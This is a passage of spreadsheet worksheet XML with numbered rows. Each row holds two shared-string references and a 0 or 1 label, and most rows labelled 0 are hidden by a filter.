      <c r="A7819" s="1">
        <v>7817.0</v>
      </c>
      <c r="B7819" s="1" t="s">
        <v>6854</v>
      </c>
      <c r="C7819" s="1" t="s">
        <v>6855</v>
      </c>
      <c r="D7819" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7820" hidden="1">
      <c r="A7820" s="1">
        <v>7818.0</v>
      </c>
      <c r="B7820" s="1" t="s">
        <v>5554</v>
      </c>
      <c r="C7820" s="1" t="s">
        <v>5555</v>
      </c>
      <c r="D7820" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7821" hidden="1">
      <c r="A7821" s="1">
        <v>7819.0</v>
      </c>
      <c r="B7821" s="1" t="s">
        <v>5194</v>
      </c>
      <c r="C7821" s="1" t="s">
        <v>5195</v>
      </c>
      <c r="D7821" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7822">
      <c r="A7822" s="1">
        <v>7820.0</v>
      </c>
      <c r="B7822" s="1" t="s">
        <v>9492</v>
      </c>
      <c r="C7822" s="1" t="s">
        <v>9493</v>
      </c>
      <c r="D7822" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7823" hidden="1">
      <c r="A7823" s="1">
        <v>7821.0</v>
      </c>
      <c r="B7823" s="1" t="s">
        <v>9494</v>
      </c>
      <c r="C7823" s="1" t="s">
        <v>9495</v>
      </c>
      <c r="D7823" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7824" hidden="1">
      <c r="A7824" s="1">
        <v>7822.0</v>
      </c>
      <c r="B7824" s="1" t="s">
        <v>9496</v>
      </c>
      <c r="C7824" s="1" t="s">
        <v>9497</v>
      </c>
      <c r="D7824" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7825" hidden="1">
      <c r="A7825" s="1">
        <v>7823.0</v>
      </c>
      <c r="B7825" s="1" t="s">
        <v>1227</v>
      </c>
      <c r="C7825" s="1" t="s">
        <v>7419</v>
      </c>
      <c r="D7825" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7826" hidden="1">
      <c r="A7826" s="1">
        <v>7824.0</v>
      </c>
      <c r="B7826" s="1" t="s">
        <v>9498</v>
      </c>
      <c r="C7826" s="1" t="s">
        <v>9499</v>
      </c>
      <c r="D7826" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7827" hidden="1">
      <c r="A7827" s="1">
        <v>7825.0</v>
      </c>
      <c r="B7827" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="C7827" s="1" t="s">
        <v>9367</v>
      </c>
      <c r="D7827" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7828" hidden="1">
      <c r="A7828" s="1">
        <v>7826.0</v>
      </c>
      <c r="B7828" s="1" t="s">
        <v>7867</v>
      </c>
      <c r="C7828" s="1" t="s">
        <v>9500</v>
      </c>
      <c r="D7828" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7829">
      <c r="A7829" s="1">
        <v>7827.0</v>
      </c>
      <c r="B7829" s="1" t="s">
        <v>9501</v>
      </c>
      <c r="C7829" s="1" t="s">
        <v>9502</v>
      </c>
      <c r="D7829" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7830" hidden="1">
      <c r="A7830" s="1">
        <v>7828.0</v>
      </c>
      <c r="B7830" s="1" t="s">
        <v>1529</v>
      </c>
      <c r="C7830" s="1" t="s">
        <v>9503</v>
      </c>
      <c r="D7830" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7831">
      <c r="A7831" s="1">
        <v>7829.0</v>
      </c>
      <c r="B7831" s="1" t="s">
        <v>8748</v>
      </c>
      <c r="C7831" s="1" t="s">
        <v>8749</v>
      </c>
      <c r="D7831" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7832" hidden="1">
      <c r="A7832" s="1">
        <v>7830.0</v>
      </c>
      <c r="B7832" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C7832" s="1" t="s">
        <v>899</v>
      </c>
      <c r="D7832" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7833" hidden="1">
      <c r="A7833" s="1">
        <v>7831.0</v>
      </c>
      <c r="B7833" s="1" t="s">
        <v>4327</v>
      </c>
      <c r="C7833" s="1" t="s">
        <v>9504</v>
      </c>
      <c r="D7833" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7834" hidden="1">
      <c r="A7834" s="1">
        <v>7832.0</v>
      </c>
      <c r="B7834" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C7834" s="1" t="s">
        <v>2585</v>
      </c>
      <c r="D7834" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7835">
      <c r="A7835" s="1">
        <v>7833.0</v>
      </c>
      <c r="B7835" s="1" t="s">
        <v>9505</v>
      </c>
      <c r="C7835" s="1" t="s">
        <v>9506</v>
      </c>
      <c r="D7835" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7836">
      <c r="A7836" s="1">
        <v>7834.0</v>
      </c>
      <c r="B7836" s="1" t="s">
        <v>8517</v>
      </c>
      <c r="C7836" s="1" t="s">
        <v>8518</v>
      </c>
      <c r="D7836" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7837" hidden="1">
      <c r="A7837" s="1">
        <v>7835.0</v>
      </c>
      <c r="B7837" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C7837" s="1" t="s">
        <v>190</v>
      </c>
      <c r="D7837" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7838">
      <c r="A7838" s="1">
        <v>7836.0</v>
      </c>
      <c r="B7838" s="1" t="s">
        <v>9507</v>
      </c>
      <c r="C7838" s="1" t="s">
        <v>9508</v>
      </c>
      <c r="D7838" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7839" hidden="1">
      <c r="A7839" s="1">
        <v>7837.0</v>
      </c>
      <c r="B7839" s="1" t="s">
        <v>9509</v>
      </c>
      <c r="C7839" s="1" t="s">
        <v>9510</v>
      </c>
      <c r="D7839" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7840" hidden="1">
      <c r="A7840" s="1">
        <v>7838.0</v>
      </c>
      <c r="B7840" s="1" t="s">
        <v>7999</v>
      </c>
      <c r="C7840" s="1" t="s">
        <v>8000</v>
      </c>
      <c r="D7840" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7841" hidden="1">
      <c r="A7841" s="1">
        <v>7839.0</v>
      </c>
      <c r="B7841" s="1" t="s">
        <v>9511</v>
      </c>
      <c r="C7841" s="1" t="s">
        <v>9512</v>
      </c>
      <c r="D7841" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7842" hidden="1">
      <c r="A7842" s="1">
        <v>7840.0</v>
      </c>
      <c r="B7842" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C7842" s="1" t="s">
        <v>9513</v>
      </c>
      <c r="D7842" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7843" hidden="1">
      <c r="A7843" s="1">
        <v>7841.0</v>
      </c>
      <c r="B7843" s="1" t="s">
        <v>9514</v>
      </c>
      <c r="C7843" s="1" t="s">
        <v>9515</v>
      </c>
      <c r="D7843" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7844" hidden="1">
      <c r="A7844" s="1">
        <v>7842.0</v>
      </c>
      <c r="B7844" s="1" t="s">
        <v>6125</v>
      </c>
      <c r="C7844" s="1" t="s">
        <v>6126</v>
      </c>
      <c r="D7844" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7845" hidden="1">
      <c r="A7845" s="1">
        <v>7843.0</v>
      </c>
      <c r="B7845" s="1" t="s">
        <v>6086</v>
      </c>
      <c r="C7845" s="1" t="s">
        <v>6087</v>
      </c>
      <c r="D7845" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7846">
      <c r="A7846" s="1">
        <v>7844.0</v>
      </c>
      <c r="B7846" s="1" t="s">
        <v>6285</v>
      </c>
      <c r="C7846" s="1" t="s">
        <v>6286</v>
      </c>
      <c r="D7846" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7847" hidden="1">
      <c r="A7847" s="1">
        <v>7845.0</v>
      </c>
      <c r="B7847" s="1" t="s">
        <v>4826</v>
      </c>
      <c r="C7847" s="1" t="s">
        <v>9467</v>
      </c>
      <c r="D7847" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7848" hidden="1">
      <c r="A7848" s="1">
        <v>7846.0</v>
      </c>
      <c r="B7848" s="1" t="s">
        <v>9516</v>
      </c>
      <c r="C7848" s="1" t="s">
        <v>9517</v>
      </c>
      <c r="D7848" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7849" hidden="1">
      <c r="A7849" s="1">
        <v>7847.0</v>
      </c>
      <c r="B7849" s="1" t="s">
        <v>1985</v>
      </c>
      <c r="C7849" s="1" t="s">
        <v>9518</v>
      </c>
      <c r="D7849" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7850" hidden="1">
      <c r="A7850" s="1">
        <v>7848.0</v>
      </c>
      <c r="B7850" s="1" t="s">
        <v>9519</v>
      </c>
      <c r="C7850" s="1" t="s">
        <v>9520</v>
      </c>
      <c r="D7850" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7851" hidden="1">
      <c r="A7851" s="1">
        <v>7849.0</v>
      </c>
      <c r="B7851" s="1" t="s">
        <v>272</v>
      </c>
      <c r="C7851" s="1" t="s">
        <v>8980</v>
      </c>
      <c r="D7851" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7852">
      <c r="A7852" s="1">
        <v>7850.0</v>
      </c>
      <c r="B7852" s="1" t="s">
        <v>5398</v>
      </c>
      <c r="C7852" s="1" t="s">
        <v>7381</v>
      </c>
      <c r="D7852" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7853">
      <c r="A7853" s="1">
        <v>7851.0</v>
      </c>
      <c r="B7853" s="1" t="s">
        <v>5182</v>
      </c>
      <c r="C7853" s="1" t="s">
        <v>5183</v>
      </c>
      <c r="D7853" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7854">
      <c r="A7854" s="1">
        <v>7852.0</v>
      </c>
      <c r="B7854" s="1" t="s">
        <v>5455</v>
      </c>
      <c r="C7854" s="1" t="s">
        <v>5456</v>
      </c>
      <c r="D7854" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7855" hidden="1">
      <c r="A7855" s="1">
        <v>7853.0</v>
      </c>
      <c r="B7855" s="1" t="s">
        <v>6846</v>
      </c>
      <c r="C7855" s="1" t="s">
        <v>9521</v>
      </c>
      <c r="D7855" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7856" hidden="1">
      <c r="A7856" s="1">
        <v>7854.0</v>
      </c>
      <c r="B7856" s="1" t="s">
        <v>7482</v>
      </c>
      <c r="C7856" s="1" t="s">
        <v>9522</v>
      </c>
      <c r="D7856" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7857">
      <c r="A7857" s="1">
        <v>7855.0</v>
      </c>
      <c r="B7857" s="1" t="s">
        <v>9523</v>
      </c>
      <c r="C7857" s="1" t="s">
        <v>9524</v>
      </c>
      <c r="D7857" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7858" hidden="1">
      <c r="A7858" s="1">
        <v>7856.0</v>
      </c>
      <c r="B7858" s="1" t="s">
        <v>3276</v>
      </c>
      <c r="C7858" s="1" t="s">
        <v>3277</v>
      </c>
      <c r="D7858" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7859" hidden="1">
      <c r="A7859" s="1">
        <v>7857.0</v>
      </c>
      <c r="B7859" s="1" t="s">
        <v>130</v>
      </c>
      <c r="C7859" s="1" t="s">
        <v>9525</v>
      </c>
      <c r="D7859" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7860" hidden="1">
      <c r="A7860" s="1">
        <v>7858.0</v>
      </c>
      <c r="B7860" s="1" t="s">
        <v>1227</v>
      </c>
      <c r="C7860" s="1" t="s">
        <v>5132</v>
      </c>
      <c r="D7860" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7861" hidden="1">
      <c r="A7861" s="1">
        <v>7859.0</v>
      </c>
      <c r="B7861" s="1" t="s">
        <v>9526</v>
      </c>
      <c r="C7861" s="1" t="s">
        <v>9527</v>
      </c>
      <c r="D7861" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7862" hidden="1">
      <c r="A7862" s="1">
        <v>7860.0</v>
      </c>
      <c r="B7862" s="1" t="s">
        <v>34</v>
      </c>
      <c r="C7862" s="1" t="s">
        <v>9528</v>
      </c>
      <c r="D7862" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7863" hidden="1">
      <c r="A7863" s="1">
        <v>7861.0</v>
      </c>
      <c r="B7863" s="1" t="s">
        <v>5857</v>
      </c>
      <c r="C7863" s="1" t="s">
        <v>5858</v>
      </c>
      <c r="D7863" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7864" hidden="1">
      <c r="A7864" s="1">
        <v>7862.0</v>
      </c>
      <c r="B7864" s="1" t="s">
        <v>416</v>
      </c>
      <c r="C7864" s="1" t="s">
        <v>5632</v>
      </c>
      <c r="D7864" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7865" hidden="1">
      <c r="A7865" s="1">
        <v>7863.0</v>
      </c>
      <c r="B7865" s="1" t="s">
        <v>1333</v>
      </c>
      <c r="C7865" s="1" t="s">
        <v>9529</v>
      </c>
      <c r="D7865" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7866" hidden="1">
      <c r="A7866" s="1">
        <v>7864.0</v>
      </c>
      <c r="B7866" s="1" t="s">
        <v>6893</v>
      </c>
      <c r="C7866" s="1" t="s">
        <v>6894</v>
      </c>
      <c r="D7866" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7867" hidden="1">
      <c r="A7867" s="1">
        <v>7865.0</v>
      </c>
      <c r="B7867" s="1" t="s">
        <v>2801</v>
      </c>
      <c r="C7867" s="1" t="s">
        <v>9530</v>
      </c>
      <c r="D7867" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7868">
      <c r="A7868" s="1">
        <v>7866.0</v>
      </c>
      <c r="B7868" s="1" t="s">
        <v>1323</v>
      </c>
      <c r="C7868" s="1" t="s">
        <v>9531</v>
      </c>
      <c r="D7868" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7869" hidden="1">
      <c r="A7869" s="1">
        <v>7867.0</v>
      </c>
      <c r="B7869" s="1" t="s">
        <v>9532</v>
      </c>
      <c r="C7869" s="1" t="s">
        <v>9533</v>
      </c>
      <c r="D7869" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7870" hidden="1">
      <c r="A7870" s="1">
        <v>7868.0</v>
      </c>
      <c r="B7870" s="1" t="s">
        <v>9129</v>
      </c>
      <c r="C7870" s="1" t="s">
        <v>9130</v>
      </c>
      <c r="D7870" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7871" hidden="1">
      <c r="A7871" s="1">
        <v>7869.0</v>
      </c>
      <c r="B7871" s="1" t="s">
        <v>2306</v>
      </c>
      <c r="C7871" s="1" t="s">
        <v>9534</v>
      </c>
      <c r="D7871" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7872" hidden="1">
      <c r="A7872" s="1">
        <v>7870.0</v>
      </c>
      <c r="B7872" s="1" t="s">
        <v>9535</v>
      </c>
      <c r="C7872" s="1" t="s">
        <v>9536</v>
      </c>
      <c r="D7872" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7873" hidden="1">
      <c r="A7873" s="1">
        <v>7871.0</v>
      </c>
      <c r="B7873" s="1" t="s">
        <v>1333</v>
      </c>
      <c r="C7873" s="1" t="s">
        <v>9529</v>
      </c>
      <c r="D7873" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7874" hidden="1">
      <c r="A7874" s="1">
        <v>7872.0</v>
      </c>
      <c r="B7874" s="1" t="s">
        <v>3567</v>
      </c>
      <c r="C7874" s="1" t="s">
        <v>4083</v>
      </c>
      <c r="D7874" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7875" hidden="1">
      <c r="A7875" s="1">
        <v>7873.0</v>
      </c>
      <c r="B7875" s="1" t="s">
        <v>9537</v>
      </c>
      <c r="C7875" s="1" t="s">
        <v>9538</v>
      </c>
      <c r="D7875" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7876">
      <c r="A7876" s="1">
        <v>7874.0</v>
      </c>
      <c r="B7876" s="1" t="s">
        <v>4950</v>
      </c>
      <c r="C7876" s="1" t="s">
        <v>9539</v>
      </c>
      <c r="D7876" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7877" hidden="1">
      <c r="A7877" s="1">
        <v>7875.0</v>
      </c>
      <c r="B7877" s="1" t="s">
        <v>5389</v>
      </c>
      <c r="C7877" s="1" t="s">
        <v>8626</v>
      </c>
      <c r="D7877" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7878">
      <c r="A7878" s="1">
        <v>7876.0</v>
      </c>
      <c r="B7878" s="1" t="s">
        <v>9540</v>
      </c>
      <c r="C7878" s="1" t="s">
        <v>9541</v>
      </c>
      <c r="D7878" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7879" hidden="1">
      <c r="A7879" s="1">
        <v>7877.0</v>
      </c>
      <c r="B7879" s="1" t="s">
        <v>2925</v>
      </c>
      <c r="C7879" s="1" t="s">
        <v>2926</v>
      </c>
      <c r="D7879" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7880" hidden="1">
      <c r="A7880" s="1">
        <v>7878.0</v>
      </c>
      <c r="B7880" s="1" t="s">
        <v>4367</v>
      </c>
      <c r="C7880" s="1" t="s">
        <v>4368</v>
      </c>
      <c r="D7880" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7881" hidden="1">
      <c r="A7881" s="1">
        <v>7879.0</v>
      </c>
      <c r="B7881" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C7881" s="1" t="s">
        <v>8323</v>
      </c>
      <c r="D7881" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7882">
      <c r="A7882" s="1">
        <v>7880.0</v>
      </c>
      <c r="B7882" s="1" t="s">
        <v>4379</v>
      </c>
      <c r="C7882" s="1" t="s">
        <v>9542</v>
      </c>
      <c r="D7882" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7883" hidden="1">
      <c r="A7883" s="1">
        <v>7881.0</v>
      </c>
      <c r="B7883" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C7883" s="1" t="s">
        <v>2356</v>
      </c>
      <c r="D7883" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7884" hidden="1">
      <c r="A7884" s="1">
        <v>7882.0</v>
      </c>
      <c r="B7884" s="1" t="s">
        <v>9543</v>
      </c>
      <c r="C7884" s="1" t="s">
        <v>9544</v>
      </c>
      <c r="D7884" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7885">
      <c r="A7885" s="1">
        <v>7883.0</v>
      </c>
      <c r="B7885" s="1" t="s">
        <v>9545</v>
      </c>
      <c r="C7885" s="1" t="s">
        <v>9546</v>
      </c>
      <c r="D7885" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7886">
      <c r="A7886" s="1">
        <v>7884.0</v>
      </c>
      <c r="B7886" s="1" t="s">
        <v>7852</v>
      </c>
      <c r="C7886" s="1" t="s">
        <v>7853</v>
      </c>
      <c r="D7886" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7887">
      <c r="A7887" s="1">
        <v>7885.0</v>
      </c>
      <c r="B7887" s="1" t="s">
        <v>879</v>
      </c>
      <c r="C7887" s="1" t="s">
        <v>7298</v>
      </c>
      <c r="D7887" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7888" hidden="1">
      <c r="A7888" s="1">
        <v>7886.0</v>
      </c>
      <c r="B7888" s="1" t="s">
        <v>8094</v>
      </c>
      <c r="C7888" s="1" t="s">
        <v>8095</v>
      </c>
      <c r="D7888" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7889" hidden="1">
      <c r="A7889" s="1">
        <v>7887.0</v>
      </c>
      <c r="B7889" s="1" t="s">
        <v>902</v>
      </c>
      <c r="C7889" s="1" t="s">
        <v>9155</v>
      </c>
      <c r="D7889" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7890" hidden="1">
      <c r="A7890" s="1">
        <v>7888.0</v>
      </c>
      <c r="B7890" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="C7890" s="1" t="s">
        <v>9547</v>
      </c>
      <c r="D7890" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7891" hidden="1">
      <c r="A7891" s="1">
        <v>7889.0</v>
      </c>
      <c r="B7891" s="1" t="s">
        <v>9548</v>
      </c>
      <c r="C7891" s="1" t="s">
        <v>9549</v>
      </c>
      <c r="D7891" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7892" hidden="1">
      <c r="A7892" s="1">
        <v>7890.0</v>
      </c>
      <c r="B7892" s="1" t="s">
        <v>9468</v>
      </c>
      <c r="C7892" s="1" t="s">
        <v>9550</v>
      </c>
      <c r="D7892" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7893" hidden="1">
      <c r="A7893" s="1">
        <v>7891.0</v>
      </c>
      <c r="B7893" s="1" t="s">
        <v>6128</v>
      </c>
      <c r="C7893" s="1" t="s">
        <v>9551</v>
      </c>
      <c r="D7893" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7894" hidden="1">
      <c r="A7894" s="1">
        <v>7892.0</v>
      </c>
      <c r="B7894" s="1" t="s">
        <v>7069</v>
      </c>
      <c r="C7894" s="1" t="s">
        <v>7070</v>
      </c>
      <c r="D7894" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7895" hidden="1">
      <c r="A7895" s="1">
        <v>7893.0</v>
      </c>
      <c r="B7895" s="1" t="s">
        <v>7077</v>
      </c>
      <c r="C7895" s="1" t="s">
        <v>7078</v>
      </c>
      <c r="D7895" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7896" hidden="1">
      <c r="A7896" s="1">
        <v>7894.0</v>
      </c>
      <c r="B7896" s="1" t="s">
        <v>908</v>
      </c>
      <c r="C7896" s="1" t="s">
        <v>9162</v>
      </c>
      <c r="D7896" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7897" hidden="1">
      <c r="A7897" s="1">
        <v>7895.0</v>
      </c>
      <c r="B7897" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C7897" s="1" t="s">
        <v>9552</v>
      </c>
      <c r="D7897" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7898">
      <c r="A7898" s="1">
        <v>7896.0</v>
      </c>
      <c r="B7898" s="1" t="s">
        <v>9553</v>
      </c>
      <c r="C7898" s="1" t="s">
        <v>9554</v>
      </c>
      <c r="D7898" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7899" hidden="1">
      <c r="A7899" s="1">
        <v>7897.0</v>
      </c>
      <c r="B7899" s="1" t="s">
        <v>8064</v>
      </c>
      <c r="C7899" s="1" t="s">
        <v>8065</v>
      </c>
      <c r="D7899" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7900" hidden="1">
      <c r="A7900" s="1">
        <v>7898.0</v>
      </c>
      <c r="B7900" s="1" t="s">
        <v>3696</v>
      </c>
      <c r="C7900" s="1" t="s">
        <v>3697</v>
      </c>
      <c r="D7900" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7901" hidden="1">
      <c r="A7901" s="1">
        <v>7899.0</v>
      </c>
      <c r="B7901" s="1" t="s">
        <v>1245</v>
      </c>
      <c r="C7901" s="1" t="s">
        <v>1246</v>
      </c>
      <c r="D7901" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7902" hidden="1">
      <c r="A7902" s="1">
        <v>7900.0</v>
      </c>
      <c r="B7902" s="1" t="s">
        <v>9441</v>
      </c>
      <c r="C7902" s="1" t="s">
        <v>9442</v>
      </c>
      <c r="D7902" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7903" hidden="1">
      <c r="A7903" s="1">
        <v>7901.0</v>
      </c>
      <c r="B7903" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C7903" s="1" t="s">
        <v>4283</v>
      </c>
      <c r="D7903" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7904" hidden="1">
      <c r="A7904" s="1">
        <v>7902.0</v>
      </c>
      <c r="B7904" s="1" t="s">
        <v>2801</v>
      </c>
      <c r="C7904" s="1" t="s">
        <v>9530</v>
      </c>
      <c r="D7904" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7905" hidden="1">
      <c r="A7905" s="1">
        <v>7903.0</v>
      </c>
      <c r="B7905" s="1" t="s">
        <v>406</v>
      </c>
      <c r="C7905" s="1" t="s">
        <v>9555</v>
      </c>
      <c r="D7905" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7906" hidden="1">
      <c r="A7906" s="1">
        <v>7904.0</v>
      </c>
      <c r="B7906" s="1" t="s">
        <v>5060</v>
      </c>
      <c r="C7906" s="1" t="s">
        <v>5061</v>
      </c>
      <c r="D7906" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7907">
      <c r="A7907" s="1">
        <v>7905.0</v>
      </c>
      <c r="B7907" s="1" t="s">
        <v>9556</v>
      </c>
      <c r="C7907" s="1" t="s">
        <v>9557</v>
      </c>
      <c r="D7907" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7908" hidden="1">
      <c r="A7908" s="1">
        <v>7906.0</v>
      </c>
      <c r="B7908" s="1" t="s">
        <v>6047</v>
      </c>
      <c r="C7908" s="1" t="s">
        <v>6048</v>
      </c>
      <c r="D7908" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7909">
      <c r="A7909" s="1">
        <v>7907.0</v>
      </c>
      <c r="B7909" s="1" t="s">
        <v>1125</v>
      </c>
      <c r="C7909" s="1" t="s">
        <v>9558</v>
      </c>
      <c r="D7909" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7910">
      <c r="A7910" s="1">
        <v>7908.0</v>
      </c>
      <c r="B7910" s="1" t="s">
        <v>9559</v>
      </c>
      <c r="C7910" s="1" t="s">
        <v>9560</v>
      </c>
      <c r="D7910" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7911">
      <c r="A7911" s="1">
        <v>7909.0</v>
      </c>
      <c r="B7911" s="1" t="s">
        <v>9561</v>
      </c>
      <c r="C7911" s="1" t="s">
        <v>9562</v>
      </c>
      <c r="D7911" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7912" hidden="1">
      <c r="A7912" s="1">
        <v>7910.0</v>
      </c>
      <c r="B7912" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C7912" s="1" t="s">
        <v>8298</v>
      </c>
      <c r="D7912" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7913" hidden="1">
      <c r="A7913" s="1">
        <v>7911.0</v>
      </c>
      <c r="B7913" s="1" t="s">
        <v>5064</v>
      </c>
      <c r="C7913" s="1" t="s">
        <v>5065</v>
      </c>
      <c r="D7913" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7914" hidden="1">
      <c r="A7914" s="1">
        <v>7912.0</v>
      </c>
      <c r="B7914" s="1" t="s">
        <v>5963</v>
      </c>
      <c r="C7914" s="1" t="s">
        <v>9563</v>
      </c>
      <c r="D7914" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7915" hidden="1">
      <c r="A7915" s="1">
        <v>7913.0</v>
      </c>
      <c r="B7915" s="1" t="s">
        <v>774</v>
      </c>
      <c r="C7915" s="1" t="s">
        <v>9564</v>
      </c>
      <c r="D7915" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7916" hidden="1">
      <c r="A7916" s="1">
        <v>7914.0</v>
      </c>
      <c r="B7916" s="1" t="s">
        <v>4120</v>
      </c>
      <c r="C7916" s="1" t="s">
        <v>9565</v>
      </c>
      <c r="D7916" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7917" hidden="1">
      <c r="A7917" s="1">
        <v>7915.0</v>
      </c>
      <c r="B7917" s="1" t="s">
        <v>9566</v>
      </c>
      <c r="C7917" s="1" t="s">
        <v>9567</v>
      </c>
      <c r="D7917" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7918">
      <c r="A7918" s="1">
        <v>7916.0</v>
      </c>
      <c r="B7918" s="1" t="s">
        <v>9568</v>
      </c>
      <c r="C7918" s="1" t="s">
        <v>9569</v>
      </c>
      <c r="D7918" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7919" hidden="1">
      <c r="A7919" s="1">
        <v>7917.0</v>
      </c>
      <c r="B7919" s="1" t="s">
        <v>7796</v>
      </c>
      <c r="C7919" s="1" t="s">
        <v>7797</v>
      </c>
      <c r="D7919" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7920" hidden="1">
      <c r="A7920" s="1">
        <v>7918.0</v>
      </c>
      <c r="B7920" s="1" t="s">
        <v>4783</v>
      </c>
      <c r="C7920" s="1" t="s">
        <v>4784</v>
      </c>
      <c r="D7920" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7921" hidden="1">
      <c r="A7921" s="1">
        <v>7919.0</v>
      </c>
      <c r="B7921" s="1" t="s">
        <v>2711</v>
      </c>
      <c r="C7921" s="1" t="s">
        <v>9570</v>
      </c>
      <c r="D7921" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7922" hidden="1">
      <c r="A7922" s="1">
